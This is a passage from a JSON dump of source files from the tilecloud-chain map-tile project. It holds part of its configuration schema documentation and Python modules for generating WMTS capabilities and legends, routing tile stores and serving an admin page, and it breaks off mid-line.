_(string)_: A WMS fallback URL (deprecated).\n  - **`resolution`** _(integer)_: The resolution, default is 4.\n  - **`layers_fields`** _(object)_: The Mapnik layers fields. Can contain additional properties.\n    - **Additional Properties** _(array)_: The Mapnik layer fields.\n      - **Items** _(string)_\n  - **`drop_empty_utfgrid`** _(boolean)_: Drop if the tile is empty, default is False.\n- <a id=\"definitions/layer\"></a>**`layer`**: The layer definition, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#configure-layers.\n  - **Any of**\n    - : Refer to _[#/definitions/layer_wms](#definitions/layer_wms)_.\n    - : Refer to _[#/definitions/layer_mapnik](#definitions/layer_mapnik)_.\n- <a id=\"definitions/process\"></a>**`process`** _(array)_: A command.\n  - **Items** _(object)_: Cannot contain additional properties.\n    - **`cmd`** _(string, required)_: The shell command, available parameters: %(in)s, %(out)s, %(args)s, %(x)s, %(y)s, %(z)s.\n    - **`need_out`** _(boolean)_: The command will generate an output in a file, default is False. Default: `false`.\n    - **`arg`** _(object)_: Used to build the %(args). Cannot contain additional properties.\n      - **`default`** _(string)_: The arguments used by default.\n      - **`verbose`** _(string)_: The arguments used in verbose mode.\n      - **`debug`** _(string)_: The arguments used in debug mode.\n      - **`quiet`** _(string)_: The arguments used in quiet mode.\n- <a id=\"definitions/generation\"></a>**`generation`** _(object)_: The configuration used for the generation. Cannot contain additional properties.\n  - **`default_cache`** _(string)_: The default cache name to be used, default is 'default'. 
Default: `\"default\"`.\n  - **`default_layers`** _(array)_: The default layers to be generated.\n    - **Items** _(string)_\n  - **`authorised_user`** _(string)_: The authorized user to generate the tiles (used to avoid permission issues on generated tiles) (main configuration).\n  - **`maxconsecutive_errors`** _(integer)_: The maximum number of consecutive errors (main configuration), default is 10. Default: `10`.\n  - **`error_file`** _(string)_: File name generated with the tiles in error, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#tiles-error-file (main configuration).\n  - **`number_process`** _(integer)_: Number of processes used to generate the tiles (main configuration), default is 1. Default: `1`.\n- <a id=\"definitions/aws_region\"></a>**`aws_region`** _(string)_: The region, default is 'eu-west-1'.\n- <a id=\"definitions/redis\"></a>**`redis`** _(object)_: The Redis configuration (main configuration). Cannot contain additional properties.\n  - **`url`** _(string)_: The server URL (main configuration).\n  - **`sentinels`** _(array)_: The sentinels (main configuration).\n    - **Items** _(array)_: A sentinel (main configuration).\n      - **Items**:\n        - _string_: The sentinel host name (main configuration).\n        - : The sentinel port (main configuration).\n          - **Any of**\n            - _string_\n            - _integer_\n  - **`connection_kwargs`** _(object)_: The Redis connection arguments (main configuration).\n  - **`sentinel_kwargs`** _(object)_: The Redis sentinel arguments (main configuration).\n  - **`service_name`** _(string)_: The service name, default is 'mymaster' (main configuration). Default: `\"mymaster\"`.\n  - **`socket_timeout`** _(integer)_: The socket timeout (main configuration).\n  - **`db`** _(integer)_\n  - **`queue`** _(string)_: The queue name (main configuration). Default: `\"tilecloud\"`.\n  - **`timeout`** _(integer)_: The timeout (main configuration), default is 5. Default: `5`.\n  - **`pending_timeout`** _(integer)_: The pending timeout (main configuration), default is 300. Default: `300`.\n  - **`max_retries`** _(integer)_: The max retries (main configuration), default is 5. Default: `5`.\n  - **`max_errors_age`** _(integer)_: The max error age (main configuration), default is 86400 (1 day). Default: `86400`.\n  - **`max_errors_nb`** _(integer)_: The max error number (main configuration), default is 100. Default: `100`.\n  - **`prefix`** _(string)_: The prefix (main configuration), default is 'tilecloud_cache'. Default: `\"tilecloud_cache\"`.\n  - **`expiration`** _(integer)_: The meta-tile in queue expiration (main configuration), default is 28800 (8 hours). Default: `28800`.\n  - **`pending_count`** _(integer)_: The pending count: the number of pending tiles fetched in one request (main configuration), default is 10. Default: `10`.\n  - **`pending_max_count`** _(integer)_: The pending max count: the maximum number of pending tiles fetched in one pass (if not generating other tiles, every second) (main configuration), default is 10000. Default: `10000`.\n- <a id=\"definitions/server\"></a>**`server`** _(object)_: Configuration used by the tile server, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#distribute-the-tiles. Cannot contain additional properties.\n  - **`cache`** _(string)_: The used cache name.\n  - **`layers`** _(array)_: Layers available in the server, default is all layers.\n    - **Items** _(string)_\n  - **`geoms_redirect`** _(boolean)_: Take the geometries into account, default is False. 
Default: `false`.\n  - **`static_allow_extension`** _(array)_: The allowed extensions of static files, defaults to [jpeg, png, xml, js, html, css].\n    - **Items** _(string)_\n  - **`wmts_path`** _(string)_: The sub-path for the WMTS (main configuration), default is 'wmts'. Default: `\"wmts\"`.\n  - **`static_path`** _(string)_: The sub-path for the static files (main configuration), default is 'static'. Default: `\"static\"`.\n  - **`admin_path`** _(string)_: The sub-path for the admin (main configuration), default is 'admin'. Default: `\"admin\"`.\n  - **`expires`** _(integer)_: The browser cache expiration, default is 8 (hours). Default: `8`.\n  - **`predefined_commands`** _(array)_: The predefined commands used to generate the tiles.\n    - **Items** _(object)_: Cannot contain additional properties.\n      - **`command`** _(string)_: The command to run.\n      - **`name`** _(string)_: The name used in the admin interface.\n  - **`allowed_commands`** _(array)_: The allowed commands (main configuration).\n    - **Items** _(string)_\n  - **`allowed_arguments`** _(array)_: The allowed arguments (main configuration).\n    - **Items** _(string)_\n- <a id=\"definitions/cost\"></a>**`cost`** _(object)_: The configuration used to calculate the cost (unmaintained). Cannot contain additional properties.\n  - **`request_per_layers`** _(integer)_: Tile requests per month, default is 10 000 000. Default: `10000000`.\n  - **`s3`** _(object)_: The S3 cost (main configuration). Cannot contain additional properties.\n    - **`storage`** _(number)_: The storage cost in $ / Gio / month (main configuration). Default: `0.125`.\n    - **`put`** _(number)_: The cost of put in $ per 10 000 requests (main configuration). Default: `0.01`.\n    - **`get`** _(number)_: The cost of get in $ per 10 000 requests (main configuration). Default: `0.01`.\n    - **`download`** _(number)_: The cost of download in $ per Gio (main configuration). Default: `0.12`.\n  - **`cloudfront`** _(object)_: The CloudFront cost (main configuration). Cannot contain additional properties.\n    - **`get`** _(number)_: The cost of get in $ per 10 000 requests (main configuration). Default: `0.009`.\n    - **`download`** _(number)_: The cost of download in $ per Gio (main configuration). Default: `0.12`.\n  - **`sqs`** _(object)_: The SQS cost, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#configure-sqs (main configuration). Cannot contain additional properties.\n    - **`request`** _(number)_: The cost of request in $ per 1 000 000 requests (main configuration). Default: `0.01`.\n- <a id=\"definitions/metadata\"></a>**`metadata`** _(object)_: The configuration of the WMTS capabilities metadata. Cannot contain additional properties.\n  - **`title`** _(string, required)_: The title.\n  - **`abstract`** _(string)_: The abstract.\n  - **`servicetype`** _(string)_: The service type, default is 'OGC WMTS'. Default: `\"OGC WMTS\"`.\n  - **`keywords`** _(array)_: The keywords.\n    - **Items** _(string)_\n  - **`fees`** _(string)_: The fees.\n  - **`access_constraints`** _(string)_: The access constraints.\n- <a id=\"definitions/provider\"></a>**`provider`** _(object)_: The provider. Cannot contain additional properties.\n  - **`name`** _(string)_\n  - **`url`** _(string)_: The public URL.\n  - **`contact`** _(object)_: The contact. Cannot contain additional properties.\n    - **`name`** _(string)_\n    - **`position`** _(string)_\n    - **`info`** _(object)_: The information. Cannot contain additional properties.\n      - **`phone`** _(object)_: The phone. 
Cannot contain additional properties.\n - **`voice`** _(string)_: The voice number.\n - **`fax`** _(string)_: The fax number.\n - **`address`** _(object)_: The address. Cannot contain additional properties.\n - **`delivery`** _(string)_: The delivery.\n - **`city`** _(string)_: The city.\n - **`area`** _(string)_: The area.\n - **`postal_code`** _(integer)_: The postal code.\n - **`country`** _(string)_: The country.\n - **`email`** _(string)_: The email.\n- <a id=\"definitions/logging\"></a>**`logging`** _(object)_: The logging configuration to database, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#logging (main configuration). Cannot contain additional properties.\n - **`database`** _(object, required)_: The database (main configuration). Cannot contain additional properties.\n - **`host`** _(string)_: The host (main configuration).\n - **`port`** _(integer)_: The port (main configuration), default is 5432. Default: `5432`.\n - **`dbname`** _(string, required)_: The database name (main configuration).\n - **`table`** _(string, required)_: The table name (main configuration).\n - **`user`** _(string, required)_: The user name (main configuration).\n - **`password`** _(string, required)_: The password (main configuration).\n" }, { "alpha_fraction": 0.5295293927192688, "alphanum_fraction": 0.533341646194458, "avg_line_length": 38.6064338684082, "blob_id": "bf992f2bfebe8b740ba0f9bc00641879e3971040", "content_id": "7a610e139f2fa62a0324852db71ba68748b40e8e", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16001, "license_type": "permissive", "max_line_length": 110, "num_lines": 404, "path": "/tilecloud_chain/controller.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import logging\nimport math\nimport os\nimport pkgutil\nimport sys\nfrom argparse import ArgumentParser\nfrom copy import copy\nfrom hashlib import sha1\nfrom io import BytesIO, StringIO\nfrom math import exp, log\nfrom typing import IO, List, Literal, Optional, Union, cast\nfrom urllib.parse import urlencode, urljoin\n\nimport botocore.exceptions\nimport requests\nimport ruamel.yaml\nfrom azure.core.exceptions import ResourceNotFoundError\nfrom azure.identity import DefaultAzureCredential\nfrom azure.storage.blob import BlobServiceClient, ContentSettings\nfrom bottle import jinja2_template\nfrom PIL import Image\nfrom prometheus_client import Summary\n\nimport tilecloud.store.redis\nimport tilecloud.store.s3\nimport tilecloud_chain.configuration\nfrom tilecloud.lib.PIL_ import FORMAT_BY_CONTENT_TYPE\nfrom tilecloud_chain import (\n DatedConfig,\n TileGeneration,\n add_common_options,\n get_queue_store,\n get_tile_matrix_identifier,\n)\n\n_LOGGER = logging.getLogger(__name__)\n_GET_STATUS_SUMMARY = Summary(\"tilecloud_chain_get_status\", \"Number of get_stats\", [\"type\", \"queue\"])\n\n\ndef main(args: Optional[List[str]] = None, out: Optional[IO[str]] = None) -> None:\n \"\"\"Generate the contextual file like the legends.\"\"\"\n\n del out\n\n try:\n parser = ArgumentParser(\n description=\"Used to generate the contextual file like the capabilities, the legends, \"\n \"the OpenLayers example\",\n prog=args[0] if args else sys.argv[0],\n )\n add_common_options(parser, tile_pyramid=False, no_geom=False, default_config_file=True)\n parser.add_argument(\n \"--status\", default=False, action=\"store_true\", help=\"Display the SQS queue status and exit\"\n )\n parser.add_argument(\n 
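# Option used below to trigger _generate_legend_images\n            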
\"--legends\",\n            \"--generate-legend-images\",\n            default=False,\n            action=\"store_true\",\n            dest=\"legends\",\n            help=\"Generate the legend images\",\n        )\n        parser.add_argument(\n            \"--dump-config\",\n            default=False,\n            action=\"store_true\",\n            help=\"Dump the used config with default values and exit\",\n        )\n\n        options = parser.parse_args(args[1:] if args else sys.argv[1:])\n        gene = TileGeneration(options.config, options, layer_name=options.layer)\n        assert gene.config_file\n        config = gene.get_config(gene.config_file)\n\n        if options.status:\n            status(gene)\n            sys.exit(0)\n\n        if options.cache is None:\n            options.cache = config.config[\"generation\"][\"default_cache\"]\n\n        if options.dump_config:\n            _validate_generate_wmts_capabilities(config.config[\"caches\"][options.cache], options.cache, True)\n            yaml = ruamel.yaml.YAML()\n            yaml_out = StringIO()\n            yaml.dump(config.config, yaml_out)\n            print(yaml_out.getvalue())\n            sys.exit(0)\n\n        if options.legends:\n            _generate_legend_images(gene)\n\n    except SystemExit:\n        raise\n    except:  # pylint: disable=bare-except\n        _LOGGER.exception(\"Exit with exception\")\n        if os.environ.get(\"TESTS\", \"false\").lower() == \"true\":\n            raise\n        sys.exit(1)\n\n\ndef get_azure_client() -> BlobServiceClient:\n    \"\"\"Get the Azure blob storage client.\"\"\"\n    if \"AZURE_STORAGE_CONNECTION_STRING\" in os.environ and os.environ[\"AZURE_STORAGE_CONNECTION_STRING\"]:\n        return BlobServiceClient.from_connection_string(os.environ[\"AZURE_STORAGE_CONNECTION_STRING\"])\n    else:\n        return BlobServiceClient(\n            account_url=os.environ[\"AZURE_STORAGE_ACCOUNT_URL\"],\n            credential=DefaultAzureCredential(),\n        )\n\n\ndef _send(\n    data: Union[bytes, str], path: str, mime_type: str, cache: tilecloud_chain.configuration.Cache\n) -> None:\n    if cache[\"type\"] == \"s3\":\n        cache_s3 = cast(tilecloud_chain.configuration.CacheS3, cache)\n        client = tilecloud.store.s3.get_client(cache_s3.get(\"host\"))\n        key_name = os.path.join(f\"{cache['folder']}\", path)\n        bucket = cache_s3[\"bucket\"]\n        client.put_object(\n            ACL=\"public-read\",\n            Body=data,\n            Key=key_name,\n            Bucket=bucket,\n            ContentEncoding=\"utf-8\",\n            ContentType=mime_type,\n        )\n    elif cache[\"type\"] == \"azure\":\n        cache_azure = cast(tilecloud_chain.configuration.CacheAzure, cache)\n        key_name = os.path.join(f\"{cache['folder']}\", path)\n        blob = get_azure_client().get_blob_client(container=cache_azure[\"container\"], blob=key_name)\n        blob.upload_blob(\n            data,\n            overwrite=True,\n            content_settings=ContentSettings(  # type: ignore\n                content_type=mime_type,\n                content_encoding=\"utf-8\",\n                cache_control=cache_azure[\"cache_control\"],\n            ),\n        )\n    else:\n        if isinstance(data, str):\n            data = data.encode(\"utf-8\")\n\n        folder = cache[\"folder\"] or \"\"\n        filename = os.path.join(folder, path)\n        directory = os.path.dirname(filename)\n        if not os.path.exists(directory):\n            os.makedirs(directory)\n        with open(filename, \"wb\") as f:\n            f.write(data)\n\n\ndef _get(path: str, cache: tilecloud_chain.configuration.Cache) -> Optional[bytes]:\n    if cache[\"type\"] == \"s3\":\n        cache_s3 = cast(tilecloud_chain.configuration.CacheS3, cache)\n        client = tilecloud.store.s3.get_client(cache_s3.get(\"host\"))\n        key_name = os.path.join(f\"{cache['folder']}\", path)\n        bucket = cache_s3[\"bucket\"]\n        try:\n            response = client.get_object(Bucket=bucket, Key=key_name)\n            return cast(bytes, response[\"Body\"].read())\n        except botocore.exceptions.ClientError as ex:\n            if ex.response[\"Error\"][\"Code\"] == \"NoSuchKey\":\n                return None\n            else:\n                
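# Any other S3 error than a missing key is unexpected, propagate it to the caller\n                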
raise\n if cache[\"type\"] == \"azure\":\n cache_azure = cast(tilecloud_chain.configuration.CacheAzure, cache)\n key_name = os.path.join(f\"{cache['folder']}\", path)\n try:\n blob = get_azure_client().get_blob_client(container=cache_azure[\"container\"], blob=key_name)\n return blob.download_blob().readall()\n except ResourceNotFoundError:\n return None\n else:\n cache_filesystem = cast(tilecloud_chain.configuration.CacheFilesystem, cache)\n p = os.path.join(cache_filesystem[\"folder\"], path)\n if not os.path.isfile(p):\n return None\n with open(p, \"rb\") as file:\n return file.read()\n\n\ndef _validate_generate_wmts_capabilities(\n cache: tilecloud_chain.configuration.Cache, cache_name: str, exit_: bool\n) -> bool:\n if \"http_url\" not in cache and \"http_urls\" not in cache:\n _LOGGER.error(\n \"The attribute 'http_url' or 'http_urls' is required in the object cache[%s].\", cache_name\n )\n if exit_:\n sys.exit(1)\n return False\n return True\n\n\ndef get_wmts_capabilities(\n gene: TileGeneration, cache_name: str, exit_: bool = False, config: Optional[DatedConfig] = None\n) -> Optional[str]:\n \"\"\"Get the WMTS capabilities for a configuration file.\"\"\"\n\n if config is None:\n assert gene.config_file\n config = gene.get_config(gene.config_file)\n\n cache = config.config[\"caches\"][cache_name]\n if _validate_generate_wmts_capabilities(cache, cache_name, exit_):\n server = gene.get_main_config().config.get(\"server\")\n\n base_urls = _get_base_urls(cache)\n _fill_legend(gene, cache, server, base_urls, config=config)\n\n data = pkgutil.get_data(\"tilecloud_chain\", \"wmts_get_capabilities.jinja\")\n assert data\n return cast(\n str,\n jinja2_template(\n data.decode(\"utf-8\"),\n layers=config.config[\"layers\"],\n layer_legends=gene.layer_legends,\n grids=config.config[\"grids\"],\n getcapabilities=urljoin( # type: ignore\n base_urls[0],\n (\n server.get(\"wmts_path\", \"wmts\") + \"/1.0.0/WMTSCapabilities.xml\"\n if server is not None\n else cache.get(\"wmtscapabilities_file\", \"1.0.0/WMTSCapabilities.xml\")\n ),\n ),\n base_urls=base_urls,\n base_url_postfix=(server.get(\"wmts_path\", \"wmts\") + \"/\") if server is not None else \"\",\n get_tile_matrix_identifier=get_tile_matrix_identifier,\n server=server is not None,\n has_metadata=\"metadata\" in config.config,\n metadata=config.config.get(\"metadata\"),\n has_provider=\"provider\" in config.config,\n provider=config.config.get(\"provider\"),\n enumerate=enumerate,\n ceil=math.ceil,\n int=int,\n sorted=sorted,\n ),\n )\n return None\n\n\ndef _get_base_urls(cache: tilecloud_chain.configuration.Cache) -> List[str]:\n base_urls = []\n if \"http_url\" in cache:\n if \"hosts\" in cache:\n cc = copy(cache)\n for host in cache[\"hosts\"]:\n cc[\"host\"] = host # type: ignore\n base_urls.append(cache[\"http_url\"] % cc)\n else:\n base_urls = [cache[\"http_url\"] % cache]\n if \"http_urls\" in cache:\n base_urls = [url % cache for url in cache[\"http_urls\"]]\n base_urls = [url + \"/\" if url[-1] != \"/\" else url for url in base_urls]\n return base_urls\n\n\ndef _fill_legend(\n gene: TileGeneration,\n cache: tilecloud_chain.configuration.Cache,\n server: Optional[tilecloud_chain.configuration.Server],\n base_urls: List[str],\n config: Optional[DatedConfig] = None,\n) -> None:\n if config is None:\n assert gene.config_file\n config = gene.get_config(gene.config_file)\n\n for layer_name, layer in config.config[\"layers\"].items():\n previous_legend: Optional[tilecloud_chain.Legend] = None\n previous_resolution = None\n if 
\"legend_mime\" in layer and \"legend_extension\" in layer and layer_name not in gene.layer_legends:\n            gene.layer_legends[layer_name] = []\n            legends = gene.layer_legends[layer_name]\n            for zoom, resolution in enumerate(config.config[\"grids\"][layer[\"grid\"]][\"resolutions\"]):\n                path = \"/\".join(\n                    [\n                        \"1.0.0\",\n                        layer_name,\n                        layer[\"wmts_style\"],\n                        f\"legend{zoom}.{layer['legend_extension']}\",\n                    ]\n                )\n                img = _get(path, cache)\n                if img is not None:\n                    new_legend: tilecloud_chain.Legend = {\n                        \"mime_type\": layer[\"legend_mime\"],\n                        \"href\": os.path.join(\n                            base_urls[0], server.get(\"static_path\", \"static\") + \"/\" if server else \"\", path\n                        ),\n                    }\n                    legends.append(new_legend)\n                    if previous_legend is not None:\n                        assert previous_resolution is not None\n                        middle_res = exp((log(previous_resolution) + log(resolution)) / 2)\n                        previous_legend[\"min_resolution\"] = middle_res\n                        new_legend[\"max_resolution\"] = middle_res\n                    try:\n                        pil_img = Image.open(BytesIO(img))\n                        new_legend[\"width\"] = pil_img.size[0]\n                        new_legend[\"height\"] = pil_img.size[1]\n                    except Exception:  # pragma: nocover\n                        _LOGGER.warning(\n                            \"Unable to read legend image '%s', with '%s'\",\n                            path,\n                            repr(img),\n                            exc_info=True,\n                        )\n                    previous_legend = new_legend\n                previous_resolution = resolution\n\n\ndef _generate_legend_images(gene: TileGeneration) -> None:\n    assert gene.config_file\n    config = gene.get_config(gene.config_file)\n    cache = config.config[\"caches\"][gene.options.cache]\n\n    for layer_name, layer in config.config[\"layers\"].items():\n        if \"legend_mime\" in layer and \"legend_extension\" in layer:\n            if layer[\"type\"] == \"wms\":\n                session = requests.session()\n                session.headers.update(layer[\"headers\"])\n                previous_hash = None\n                for zoom, resolution in enumerate(config.config[\"grids\"][layer[\"grid\"]][\"resolutions\"]):\n                    legends = []\n                    for wmslayer in layer[\"layers\"].split(\",\"):\n                        response = session.get(\n                            layer[\"url\"]\n                            + \"?\"\n                            + urlencode(\n                                {\n                                    \"SERVICE\": \"WMS\",\n                                    \"VERSION\": layer.get(\"version\", \"1.0.0\"),\n                                    \"REQUEST\": \"GetLegendGraphic\",\n                                    \"LAYER\": wmslayer,\n                                    \"FORMAT\": layer[\"legend_mime\"],\n                                    \"TRANSPARENT\": \"TRUE\" if layer[\"legend_mime\"] == \"image/png\" else \"FALSE\",\n                                    \"STYLE\": layer[\"wmts_style\"],\n                                    \"SCALE\": resolution / 0.00028,\n                                }\n                            )\n                        )\n                        try:\n                            legends.append(Image.open(BytesIO(response.content)))\n                        except Exception:  # pragma: nocover\n                            _LOGGER.warning(\n                                \"Unable to read legend image for layer '%s'-'%s', resolution '%s': %s\",\n                                layer_name,\n                                wmslayer,\n                                resolution,\n                                response.content,\n                                exc_info=True,\n                            )\n                    width = max(i.size[0] for i in legends)\n                    height = sum(i.size[1] for i in legends)\n                    image = Image.new(\"RGBA\", (width, height))\n                    y = 0\n                    for i in legends:\n                        image.paste(i, (0, y))\n                        y += i.size[1]\n                    string_io = BytesIO()\n                    image.save(string_io, FORMAT_BY_CONTENT_TYPE[layer[\"legend_mime\"]])\n                    result = string_io.getvalue()\n                    new_hash = sha1(result).hexdigest()  # nosec\n                    if new_hash != previous_hash:\n                        previous_hash = new_hash\n                        _send(\n                            result,\n                            f\"1.0.0/{layer_name}/{layer['wmts_style']}/\"\n                            f\"legend{zoom}.{layer['legend_extension']}\",\n                            layer[\"legend_mime\"],\n                            cache,\n                        )\n\n\ndef _get_resource(resource: str) -> bytes:\n    path = os.path.join(os.path.dirname(__file__), resource)\n    with open(path, \"rb\") as f:\n        return f.read()\n\n\ndef status(gene: TileGeneration) -> None:\n    \"\"\"Print the tile generation status.\"\"\"\n    print(\"\\n\".join(get_status(gene)))\n\n\ndef get_status(gene: TileGeneration) -> List[str]:\n    \"\"\"Get the tile 
generation status.\"\"\"\n config = gene.get_main_config()\n store = get_queue_store(config, False)\n type_: Union[Literal[\"redis\"], Literal[\"sqs\"]] = \"redis\" if \"redis\" in config.config else \"sqs\"\n conf = config.config[type_]\n with _GET_STATUS_SUMMARY.labels(type_, conf[\"queue\"]).time():\n status_ = store.get_status()\n return [name + \": \" + str(value) for name, value in status_.items()]\n" }, { "alpha_fraction": 0.5863965749740601, "alphanum_fraction": 0.5863965749740601, "avg_line_length": 31.778688430786133, "blob_id": "fb25eebf1e32357821b708d5ffe81d11efcd375c", "content_id": "aaeaa9d075f40ed1c704f6edbde1921eadd1146a", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3999, "license_type": "permissive", "max_line_length": 91, "num_lines": 122, "path": "/tilecloud_chain/multitilestore.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import logging\nfrom itertools import chain, groupby, starmap\nfrom typing import Callable, Dict, Iterable, Iterator, Optional, Tuple\n\nfrom tilecloud import Tile, TileStore\n\nlogger = logging.getLogger(__name__)\n\n\nclass MultiTileStore(TileStore):\n \"\"\"Redirect to the corresponding Tilestore for the layer and config file.\"\"\"\n\n def __init__(self, get_store: Callable[[str, str], Optional[TileStore]]) -> None:\n \"\"\"Initialize.\"\"\"\n TileStore.__init__(self)\n self.get_store = get_store\n self.stores: Dict[Tuple[str, str], Optional[TileStore]] = {}\n\n def _get_store(self, config_file: str, layer: str) -> Optional[TileStore]:\n store = self.stores.get((config_file, layer))\n if store is None:\n store = self.get_store(config_file, layer)\n self.stores[(config_file, layer)] = store\n return store\n\n def __contains__(self, tile: Tile) -> bool:\n \"\"\"\n Return true if this store contains ``tile``.\n\n Arguments:\n\n tile: Tile\n \"\"\"\n layer = tile.metadata[\"layer\"]\n config_file = tile.metadata[\"config_file\"]\n store = self._get_store(config_file, layer)\n assert store is not None\n return tile in store\n\n def delete_one(self, tile: Tile) -> Tile:\n \"\"\"\n Delete ``tile`` and return ``tile``.\n\n Arguments:\n\n tile: Tile\n \"\"\"\n layer = tile.metadata[\"layer\"]\n config_file = tile.metadata[\"config_file\"]\n store = self._get_store(config_file, layer)\n assert store is not None\n return store.delete_one(tile)\n\n def list(self) -> Iterator[Tile]:\n \"\"\"Generate all the tiles in the store, but without their data.\"\"\"\n # Too dangerous to list all tiles in all stores. 
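The set of underlying stores is\n        # built lazily per (config_file, layer), so the full set is not known here.\n        # 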
Return an empty iterator instead\n while False:\n yield\n\n def put_one(self, tile: Tile) -> Tile:\n \"\"\"\n Store ``tile`` in the store.\n\n Arguments:\n\n tile: Tile\n \"\"\"\n layer = tile.metadata[\"layer\"]\n config_file = tile.metadata[\"config_file\"]\n store = self._get_store(config_file, layer)\n assert store is not None\n return store.put_one(tile)\n\n def get_one(self, tile: Tile) -> Optional[Tile]:\n \"\"\"\n Add data to ``tile``, or return ``None`` if ``tile`` is not in the store.\n\n Arguments:\n\n tile: Tile\n \"\"\"\n layer = tile.metadata[\"layer\"]\n config_file = tile.metadata[\"config_file\"]\n store = self._get_store(config_file, layer)\n assert store is not None\n return store.get_one(tile)\n\n def get(self, tiles: Iterable[Optional[Tile]]) -> Iterator[Optional[Tile]]:\n \"\"\"See in superclass.\"\"\"\n\n def apply(key: Tuple[str, str], tiles: Iterator[Tile]) -> Iterable[Optional[Tile]]:\n store = self._get_store(*key)\n if store is None:\n return tiles\n return store.get(tiles)\n\n return chain.from_iterable(starmap(apply, groupby(tiles, self._get_layer)))\n\n def put(self, tiles: Iterable[Tile]) -> Iterator[Tile]:\n \"\"\"See in superclass.\"\"\"\n\n def apply(key: Tuple[str, str], tiles: Iterator[Tile]) -> Iterator[Tile]:\n store = self._get_store(*key)\n assert store is not None\n return store.put(tiles)\n\n return chain.from_iterable(starmap(apply, groupby(tiles, self._get_layer)))\n\n def delete(self, tiles: Iterable[Tile]) -> Iterator[Tile]:\n \"\"\"See in superclass.\"\"\"\n\n def apply(key: Tuple[str, str], tiles: Iterator[Tile]) -> Iterator[Tile]:\n store = self._get_store(*key)\n assert store is not None\n return store.delete(tiles)\n\n return chain.from_iterable(starmap(apply, groupby(tiles, self._get_layer)))\n\n @staticmethod\n def _get_layer(tile: Optional[Tile]) -> Tuple[str, str]:\n assert tile is not None\n return (tile.metadata[\"config_file\"], tile.metadata[\"layer\"])\n" }, { "alpha_fraction": 0.5462481379508972, "alphanum_fraction": 0.5501090884208679, "avg_line_length": 37.06389617919922, "blob_id": "11e859632158dca84bc5d5a8ffac2c9c1373e117", "content_id": "d08a858654fe1f6955c63362cc1107734a8b3475", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11914, "license_type": "permissive", "max_line_length": 113, "num_lines": 313, "path": "/tilecloud_chain/views/admin.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "# Copyright (c) 2018-2023 by Camptocamp\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# 3. Neither the name of Camptocamp nor the names of its contributors may\n# be used to endorse or promote products derived from this software\n# without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. 
IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\nimport io\nimport json\nimport logging\nimport multiprocessing\nimport os\nimport re\nimport shlex\nimport subprocess # nosec\nfrom typing import IO, Any, Callable, Dict, List\nfrom urllib.parse import urljoin\n\nimport pyramid.httpexceptions\nimport pyramid.request\nimport pyramid.response\nfrom c2cwsgiutils.auth import AuthenticationType, auth_type, auth_view\nfrom pyramid.view import view_config\n\nimport tilecloud_chain.server\nfrom tilecloud_chain import controller, generate\nfrom tilecloud_chain.controller import get_status\n\n_LOG = logging.getLogger(__name__)\n\n\nclass Admin:\n \"\"\"The admin views.\"\"\"\n\n def __init__(self, request: pyramid.request.Request):\n \"\"\"Initialize.\"\"\"\n self.request = request\n\n tilecloud_chain.server.init_tilegeneration(\n self.request.registry.settings[\"tilegeneration_configfile\"]\n )\n self.gene = tilecloud_chain.server.tilegeneration\n\n @view_config(route_name=\"admin\", renderer=\"tilecloud_chain:templates/admin_index.html\") # type: ignore\n @view_config(route_name=\"admin_slash\", renderer=\"tilecloud_chain:templates/admin_index.html\") # type: ignore\n def index(self) -> Dict[str, Any]:\n \"\"\"Get the admin index page.\"\"\"\n assert self.gene\n config = self.gene.get_host_config(self.request.host)\n server_config = config.config.get(\"server\", {})\n main_config = self.gene.get_main_config()\n main_server_config = main_config.config.get(\"server\", {})\n return {\n \"auth_type\": auth_type(self.request.registry.settings),\n \"has_access\": self.request.has_permission(\"admin\", config.config.get(\"authentication\", {})),\n \"commands\": server_config.get(\"predefined_commands\", []),\n \"status\": get_status(self.gene),\n \"admin_path\": main_server_config.get(\"admin_path\", \"admin\"),\n \"AuthenticationType\": AuthenticationType,\n }\n\n @view_config(route_name=\"admin_run\", renderer=\"fast_json\") # type: ignore\n def run(self) -> pyramid.response.Response:\n \"\"\"Run the command given by the user.\"\"\"\n assert self.gene\n auth_view(self.request)\n\n if \"command\" not in self.request.POST:\n self.request.response.status_code = 400\n return {\"error\": \"The POST argument 'command' is required\"}\n\n commands = shlex.split(self.request.POST[\"command\"])\n command = 